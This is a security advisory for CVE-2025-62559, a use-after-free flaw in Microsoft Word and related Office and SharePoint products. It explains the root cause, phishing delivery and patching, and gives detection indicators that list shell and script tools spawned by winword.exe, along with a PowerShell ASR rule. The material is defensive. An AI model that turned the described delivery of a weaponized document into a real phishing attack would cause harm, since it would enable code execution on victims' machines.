CVE-2025-62559: Microsoft 365 Apps Use-After-Free Flaw

CVE-2025-62559 Overview

CVE-2025-62559 is a use-after-free vulnerability [CWE-416] in Microsoft Office Word that allows an unauthorized attacker to execute arbitrary code locally. The flaw affects multiple Microsoft Office product lines, including Microsoft 365 Apps, Office 2019, Office Long Term Servicing Channel (LTSC) 2021 and 2024, SharePoint Server 2016 and 2019, and Word 2016. Exploitation requires the victim to open a crafted document, after which the attacker gains code execution in the security context of the current user.

Critical Impact
Successful exploitation enables local code execution with full impact on confidentiality, integrity, and availability of the affected system.

Affected Products

Microsoft 365 Apps (Enterprise, x64 and x86)
Microsoft Office 2019, Office LTSC 2021 and 2024 (Windows and macOS)
Microsoft SharePoint Server 2016 and 2019; Microsoft Word 2016

Discovery Timeline

2025-12-09 - CVE-2025-62559 published to NVD
2026-06-17 - Last updated in NVD database

Technical Details for CVE-2025-62559

Vulnerability Analysis

The vulnerability is a use-after-free condition within Microsoft Word's document parsing logic. When Word processes a malformed object inside a Word document, the application releases a memory allocation but retains a dangling pointer to the freed region. Subsequent operations dereference that stale pointer, allowing an attacker who controls the freed memory layout to redirect execution flow.

The issue is locally exploitable and requires user interaction, typically opening a weaponized .docx, .doc, or .rtf file. Because SharePoint Server is also listed as affected, documents rendered or processed through SharePoint workflows may serve as an additional delivery surface. Code executes with the privileges of the user running Word, making it a strong candidate for initial access in phishing campaigns.

Root Cause

The root cause is improper object lifetime management within Word's parsing routines. An object is freed while a reference to it remains valid in another code path. When the freed slot is reallocated with attacker-controlled data, the dangling pointer enables hijacking of virtual function dispatch or other indirect calls.

Attack Vector

An attacker crafts a malicious Office document and delivers it through email, web download, or a SharePoint repository. When the target opens the document in a vulnerable version of Word, the parser triggers the use-after-free, yielding arbitrary code execution. No authentication is required, but user interaction is necessary. See the Microsoft CVE-2025-62559 Advisory for vendor details.

No verified proof-of-concept code is publicly available for CVE-2025-62559.
Refer to the Microsoft Security Response Center advisory for technical details.

Detection Methods for CVE-2025-62559

Indicators of Compromise

Unexpected child processes spawned by winword.exe, such as cmd.exe, powershell.exe, mshta.exe, rundll32.exe, or wscript.exe.
Office documents arriving from external senders that contain embedded OLE objects, malformed structures, or unusual ActiveX controls.
Outbound network connections initiated by Word shortly after opening a document, particularly to newly registered or low-reputation domains.

Detection Strategies

Hunt for process lineage anomalies where winword.exe is the parent of script interpreters or LOLBins commonly abused for second-stage payload delivery.
Monitor for crash dumps or Windows Error Reporting events from winword.exe referencing access violations, which can indicate failed exploitation attempts.
Inspect Office telemetry for documents that trigger Protected View bypasses or Mark-of-the-Web removal prior to opening.

Monitoring Recommendations

Forward Sysmon process creation (Event ID 1) and image load (Event ID 7) events involving winword.exe to a centralized analytics platform.
Correlate email gateway attachment metadata with endpoint document-open events to identify weaponized files in transit.
Track SharePoint document library uploads and downloads of Office files originating from untrusted users or external sharing links.

How to Mitigate CVE-2025-62559

Immediate Actions Required

Apply the security updates referenced in the Microsoft CVE-2025-62559 Advisory to all affected Office, Microsoft 365 Apps, Word, and SharePoint Server installations.
Enforce Protected View and Office Application Guard for documents originating from the internet or email attachments.
Restrict execution of macros and disable legacy file formats where they are not required for business operations.

Patch Information

Microsoft has published patches for all affected SKUs in its update guide. Administrators should deploy the corresponding monthly security updates for Microsoft 365 Apps, Office 2019, Office LTSC 2021 and 2024, Word 2016, and SharePoint Server 2016 and 2019. Verify patch application by checking the build numbers documented in the vendor advisory.

Workarounds

Block inbound .doc, .docx, and .rtf attachments from untrusted senders at the email gateway until patches are deployed.
Configure Group Policy to open Office documents from the internet zone in Protected View and disable editing by default.
Use Attack Surface Reduction (ASR) rules in Microsoft Defender to block Office applications from creating child processes and injecting code into other processes.

bash

# Example ASR rule activation via PowerShell to block Office child processes
Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A `
                 -AttackSurfaceReductionRules_Actions Enabled